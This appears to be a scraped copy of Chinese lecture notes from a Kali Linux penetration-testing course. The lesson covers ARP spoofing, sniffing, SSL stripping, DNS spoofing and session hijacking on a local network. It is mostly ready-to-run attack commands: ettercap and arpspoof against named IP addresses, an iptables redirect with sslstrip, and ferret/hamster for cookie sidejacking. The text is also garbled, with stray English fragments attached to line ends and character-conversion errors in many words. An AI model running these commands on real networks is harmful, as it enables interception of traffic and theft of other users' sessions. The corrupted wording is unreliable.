Kali Linux Web滲透測試視頻教程—第十四課-arp欺騙、嗅探\dns欺騙、session

目錄 Kali Linux Web 滲透測試—第十四課-arp欺騙、嗅探、dns欺騙、session劫持 1html

關於嗅探、arp欺騙、會話劫持.............................................................. 1session

視頻教程地址:http://edu.51cto.com/course/course_id-1887.htmltcp

關於嗅探、arp欺騙、會話劫持 會話劫持的實現手段ide

l 中間人攻擊(arp欺騙,dns欺騙)工具

l 注射式攻擊測試

Arp欺騙--ettercaprest

1.若是你是第一次進行中間人攻擊操做,那麼要對kali下的ettercap作點配置,配置文件是/etc/ettercap/etter.conf 首先你要將EC_UID 、EC_GID都變爲0,而後找到LINUX分類下的IF YOU USE IPTABLES這一行,將註釋(「#」號)去掉,打開轉發。視頻

2./etc/NetworkManager/NetworkManager.conf 修改htm

3.service network-manager restart教程

4.echo 1 >> /proc/sys/net/ipv4/ip_forward

  1. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺騙—arpspoof l echo 1 >> /proc/sys/net/ipv4/ip_forward

l arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

數據包捕獲 l tcpdump

l wireshark

l drafnet等其餘自動化工具

Ssl數據嗅探 l iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(設置)

l iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l sslstrip -p -l 10000 -w log.txt

session劫持-arp欺騙 l tcpdump -i eth0 -w qq.cap

l ferret -r qq.cap

l hamster

l 選擇目標

l 測試session

64位下ferret 安裝 l dpkg --add-architecture i386

l apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l sudo aptitude install ferret-sidejack:i386

session劫持-DNS欺騙 l 1. 使用 ettercap 進行arp欺騙

l 2.修改etter.dns 文件

/etc/ettercap/etter.dns

l 3.啓用dns_spoof

課後練習: l 結合前面課程中的 set 工具集,咱們在局域網中能作到完美無缺(釣魚和消息轉發相結合)的釣魚攻擊嗎?

l 局域網中的嗅探、釣魚、session劫持、dns欺騙這一類的攻擊的防護方式是什麼?

感謝玄魂的分享,想要觀看視頻,點這裏就能夠啦:http://edu.51cto.com/course/course_id-1887.html

相關文章
相關標籤/搜索